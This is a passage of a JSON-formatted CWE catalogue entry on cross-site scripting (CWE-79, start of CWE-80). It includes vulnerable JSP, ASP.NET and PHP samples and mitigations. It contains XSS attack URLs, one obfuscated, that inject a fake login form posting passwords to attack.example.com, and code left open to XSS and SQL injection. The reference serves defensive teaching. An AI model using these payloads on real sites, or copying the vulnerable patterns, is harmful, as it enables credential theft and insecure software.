/&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}},"xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A+%3Cinput+type%3D%22password%22+name%3D%22password%22+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A","xhtml:br":["","","","","","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"trustedSite.example.com/welcome.php?username=&lt;script+type=\\"text/javascript\\"&gt;document.write(\'\\\\u003C\\\\u0064\\\\u0069\\\\u0076\\\\u0020\\\\u0069\\\\u0064\\\\u003D\\\\u0022\\\\u0073\\\\u0074\\\\u0065\\\\u0061\\\\u006C\\\\u0050\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u0022\\\\u003E\\\\u0050\\\\u006C\\\\u0065\\\\u0061\\\\u0073\\\\u0065\\\\u0020\\\\u004C\\\\u006F\\\\u0067\\\\u0069\\\\u006E\\\\u003A\\\\u003C\\\\u0066\\\\u006F\\\\u0072\\\\u006D\\\\u0020\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003D\\\\u0022\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0022\\\\u0020\\\\u0061\\\\u0063\\\\u0074\\\\u0069\\\\u006F\\\\u006E\\\\u003D\\\\u0022\\\\u0068\\\\u0074\\\\u0074\\\\u0070\\\\u003A\\\\u002F\\\\u002F\\\\u0061\\\\u0074\\\\u0074\\\\u0061\\\\u0063\\\\u006B\\\\u002E\\\\u0065\\\\u0078\\\\u0061\\\\u006D\\\\u0070\\\\u006C\\\\u0065\\\\u002E\\\\u0063\\\\u006F\\\\u006D\\\\u002F\\\\u0073\\\\u0074\\\\u0065\\\\u0061\\\\u006C\\\\u0050\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u002E\\\\u0070\\\\u0068\\\\u0070\\\\u0022\\\\u0020\\\\u006D\\\\u0065\\\\u0074\\\\u0068\\\\u006F\\\\u0064\\\\u003D\\\\u0022\\\\u0070\\\\u006F\\\\u0073\\\\u0074\\\\u0022\\\\u003E\\\\u0055\\\\u0073\\\\u0065\\\\u0072\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003A\\\\u0020\\\\u003C\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0020\\\\u0074\\\\u0079\\\\u0070\\\\u0065\\\\u003D\\\\u0022\\\\u0074\\\\u0065\\\\u0078\\\\u0074\\\\u0022\\\\u0020\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003D\\\\u0022\\\\u0075\\\\u0073\\\\u0065\\\\u0072\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u0022\\\\u0020\\\\u002F\\\\u003E\\\\u003C\\\\u0062\\\\u0072\\\\u002F\\\\u003E\\\\u0050\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u003A\\\\u0020\\\\u003C\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0020\\\\u0074\\\\u0079\\\\u0070\\\\u0065\\\\u003D\\\\u0022\\\\u0070\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u0022\\\\u0020\\\\u006E\\\\u0061\\\\u006D\\\\u0065\\\\u003D\\\\u0022\\\\u0070\\\\u0061\\\\u0073\\\\u0073\\\\u0077\\\\u006F\\\\u0072\\\\u0064\\\\u0022\\\\u0020\\\\u002F\\\\u003E\\\\u003C\\\\u0069\\\\u006E\\\\u0070\\\\u0075\\\\u0074\\\\u0020\\\\u0074\\\\u0079\\\\u0070\\\\u0065\\\\u003D\\\\u0022\\\\u0073\\\\u0075\\\\u0062\\\\u006D\\\\u0069\\\\u0074\\\\u0022\\\\u0020\\\\u0076\\\\u0061\\\\u006C\\\\u0075\\\\u0065\\\\u003D\\\\u0022\\\\u004C\\\\u006F\\\\u0067\\\\u0069\\\\u006E\\\\u0022\\\\u0020\\\\u002F\\\\u003E\\\\u003C\\\\u002F\\\\u0066\\\\u006F\\\\u0072\\\\u006D\\\\u003E\\\\u003C\\\\u002F\\\\u0064\\\\u0069\\\\u0076\\\\u003E\\\\u000D\');&lt;/script&gt;","xhtml:br":["","","","","","","","","","","","","","","","","","","","","","",""]}}],"Body_Text":["Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as","This results in a harmless alert dialog popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers.","More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user\'s password to the attacker:","If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user\'s browser:","The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability):","The same attack string could also be obfuscated as:","Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs."]},{"Intro_Text":"This example also displays a Reflected XSS (Type 1) scenario.","Body_Text":["The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.","The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user.","The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;% String eid = request.getParameter(\\"eid\\"); %&gt;...Employee ID: &lt;%= eid %&gt;","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"&lt;%protected System.Web.UI.WebControls.TextBox Login;protected System.Web.UI.WebControls.Label EmployeeID;...EmployeeID.Text = Login.Text;%&gt;&lt;p&gt;&lt;asp:label id=\\"EmployeeID\\" runat=\\"server\\" /&gt;&lt;/p&gt;","xhtml:br":["","","","","","",""]}}]},{"Intro_Text":"This example covers a Stored XSS (Type 2) scenario.","Body_Text":["The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee\'s name.","The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID.","This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user\'s web browser."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;%Statement stmt = conn.createStatement();ResultSet rs = stmt.executeQuery(\\"select * from emp where id=\\"+eid);if (rs != null) {}%&gt;Employee Name: &lt;%= name %&gt;","xhtml:br":["","","",""],"xhtml:div":{"#text":"rs.next();String name = rs.getString(\\"name\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}}},{"attr":{"@_Nature":"bad","@_Language":"ASP.NET"},"xhtml:div":{"#text":"&lt;%protected System.Web.UI.WebControls.Label EmployeeName;...string query = \\"select * from emp where id=\\" + eid;sda = new SqlDataAdapter(query, conn);sda.Fill(dt);string name = dt.Rows[0][\\"Name\\"];...EmployeeName.Text = name;%&gt;&lt;p&gt;&lt;asp:label id=\\"EmployeeName\\" runat=\\"server\\" /&gt;&lt;/p&gt;","xhtml:br":["","","","","","","","",""]}}]},{"Intro_Text":"The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario.","Body_Text":["CreateUser.php","The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information:","ListUsers.php","The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$username = mysql_real_escape_string($username);$fullName = mysql_real_escape_string($fullName);$query = sprintf(\'Insert Into users (username,password) Values (\\"%s\\",\\"%s\\",\\"%s\\")\', $username, crypt($password),$fullName) ;mysql_query($query);/.../","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$query = \'Select * From users Where loggedIn=true\';$results = mysql_query($query);if (!$results) {}echo \'&lt;div id=\\"userlist\\"&gt;Currently Active Users:\';while ($row = mysql_fetch_assoc($results)) {}echo \'&lt;/div&gt;\';","xhtml:br":["","","","","","","",""],"xhtml:div":[{"#text":"exit;","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'&lt;div class=\\"userNames\\"&gt;\'.$row[\'fullname\'].\'&lt;/div&gt;\';","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"//Print list of users to page"}}]},{"Intro_Text":"Consider an application that provides a simplistic message board that saves messages in HTML format and appends them to a file.  When a new user arrives in the room, it makes an announcement:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$name = $_COOKIE[\\"myname\\"];$announceStr = \\"$name just logged in.\\";saveMessage($announceStr);","xhtml:br":["","","",""],"xhtml:i":"//save HTML-formatted message to file; implementation details are irrelevant for this example."}},{"attr":{"@_Nature":"attack"},"xhtml:div":"&lt;script&gt;document.alert(\'Hacked\');&lt;/script&gt;"},{"attr":{"@_Nature":"result"},"xhtml:div":"&lt;script&gt;document.alert(\'Hacked\');&lt;/script&gt; has logged in."}],"Body_Text":["An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like:","The raw contents of the message file would look like:","For each person who visits the message page, their browser would execute the script, generating a pop-up window that says \\"Hacked\\". More malicious attacks are possible; see the rest of this entry."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2014-8958","Description":"Admin GUI allows XSS through cookie.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8958"},{"Reference":"CVE-2017-9764","Description":"Web stats program allows XSS through crafted HTTP header.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9764"},{"Reference":"CVE-2014-5198","Description":"Web log analysis product allows XSS through crafted HTTP Referer header.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5198"},{"Reference":"CVE-2008-5080","Description":"Chain: protection mechanism failure allows XSS","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5080"},{"Reference":"CVE-2006-4308","Description":"Chain: incomplete denylist (CWE-184) only checks \\"javascript:\\" tag, allowing XSS (CWE-79) using other tags","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308"},{"Reference":"CVE-2007-5727","Description":"Chain: incomplete denylist (CWE-184) only removes SCRIPT tags, enabling XSS (CWE-79)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727"},{"Reference":"CVE-2008-5770","Description":"Reflected XSS using the PATH_INFO in a URL","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5770"},{"Reference":"CVE-2008-4730","Description":"Reflected XSS not properly handled when generating an error message","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4730"},{"Reference":"CVE-2008-5734","Description":"Reflected XSS sent through email message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5734"},{"Reference":"CVE-2008-0971","Description":"Stored XSS in a security product.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0971"},{"Reference":"CVE-2008-5249","Description":"Stored XSS using a wiki page.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5249"},{"Reference":"CVE-2006-3568","Description":"Stored XSS in a guestbook application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3568"},{"Reference":"CVE-2006-3211","Description":"Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3211"},{"Reference":"CVE-2006-3295","Description":"Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS (CWE-79).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3295"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Cross-site scripting (XSS)"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Cross-site Scripting"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Cross-site scripting"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A1","Entry_Name":"Cross Site Scripting (XSS)","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A4","Entry_Name":"Cross-Site Scripting (XSS) Flaws","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":8,"Entry_Name":"Cross-site Scripting"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-79"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"209"}},{"attr":{"@_CAPEC_ID":"588"}},{"attr":{"@_CAPEC_ID":"591"}},{"attr":{"@_CAPEC_ID":"592"}},{"attr":{"@_CAPEC_ID":"63"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-709"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 2: Web-Server Related Vulnerabilities (XSS, XSRF, and Response Splitting).&#34; Page 31"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 3: Web-Client Related Vulnerabilities (XSS).&#34; Page 63"}},{"attr":{"@_External_Reference_ID":"REF-712"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 13, &#34;Web-Specific Input Issues&#34; Page 413"}},{"attr":{"@_External_Reference_ID":"REF-714"}},{"attr":{"@_External_Reference_ID":"REF-715"}},{"attr":{"@_External_Reference_ID":"REF-716"}},{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-718"}},{"attr":{"@_External_Reference_ID":"REF-719"}},{"attr":{"@_External_Reference_ID":"REF-720"}},{"attr":{"@_External_Reference_ID":"REF-721"}},{"attr":{"@_External_Reference_ID":"REF-722"}},{"attr":{"@_External_Reference_ID":"REF-723"}},{"attr":{"@_External_Reference_ID":"REF-724"}},{"attr":{"@_External_Reference_ID":"REF-725"}},{"attr":{"@_External_Reference_ID":"REF-726"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;Cross Site Scripting&#34;, Page 1071"}},{"attr":{"@_External_Reference_ID":"REF-956"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-79"}}]},"Notes":{"Note":[{"attr":{"@_Type":"Relationship"},"xhtml:p":"There can be a close relationship between XSS and CSRF (CWE-352).  An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload.  A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user\'s profile and add the attacker as a MySpace friend.  MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause."},{"attr":{"@_Type":"Applicable Platform"},"xhtml:p":"XSS flaws are very common in web applications, since they require a great deal of developer discipline to avoid them."}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Applicable_Platforms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Description, Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Alternate_Terms, Demonstrative_Examples, Description, Observed_Examples, References, Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Cross-site Scripting (XSS)","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Directives in a Web Page (aka \'Cross-site scripting\' (XSS))","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Preserve Web Page Structure (aka \'Cross-site Scripting\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Preserve Web Page Structure (\'Cross-site Scripting\')","attr":{"@_Date":"2010-06-21"}}]}},"80":{"attr":{"@_ID":"80","@_Name":"Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as \\"&lt;\\", \\"&gt;\\", and \\"&amp;\\" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.","Extended_Description":"This may allow such characters to be treated as control characters, which are executed client-side in the context of the user\'s session. Although this can be classified as an injection problem, the more pertinent issue is the improper conversion of such special characters to respective context-appropriate entities before displaying them to the user.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"79","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Read Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended."},{"attr":{"@_Mitigation_ID":"MIT-30.1"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component.","The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle XSS attacks."]}},{"attr":{"@_Mitigation_ID":"MIT-43"},"Phase":"Implementation","Description":"With Struts, write all data from form beans with the bean\'s filter attribute set to true."},{"attr":{"@_Mitigation_ID":"MIT-31"},"Phase":"Implementation","Strategy":"Attack Surface Reduction","Description":"To help mitigate XSS attacks against the user\'s session cookie, set the session cookie to be HttpOnly. In browsers that support the HttpOnly feature (such as more recent versions of Internet Explorer and Firefox), this attribute can prevent the user\'s session cookie from being accessible to malicious client-side scripts that use document.cookie. This is not a complete solution, since HttpOnly is not supported by all browsers. More importantly, XMLHTTPRequest and other powerful browser technologies provide read access to HTTP headers, including the Set-Cookie header in which the HttpOnly flag is set.","Effectiveness":"Defense in Depth"}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"In the following example, a guestbook comment isn\'t properly encoded, filtered, or otherwise neutralized for script-related tags before being displayed in a client browser.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;% for (Iterator i = guestbook.iterator(); i.hasNext(); ) {","xhtml:div":{"#text":"Entry e = (Entry) i.next(); %&gt;&lt;p&gt;Entry #&lt;%= e.getId() %&gt;&lt;/p&gt;&lt;p&gt;&lt;%= e.getText() %&gt;&lt;/p&gt;&lt;%} %&gt;","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-0938","Description":"XSS in parameter in a link.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0938"},{"Reference":"CVE-2002-1495","Description":"XSS in web-based email product via attachment filenames.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1495"},{"Reference":"CVE-2003-1136","Description":"HTML injection in posted message.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1136"},{"Reference":"CVE-2004-2171","Description":"XSS not quoted in error page.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2171"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Basic XSS"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"18"}},{"attr":{"@_CAPEC_ID":"193"}},{"attr":{"@_CAPEC_ID":"32"}},{"attr":{"@_CAPEC_ID":"86"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Description, Name"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content 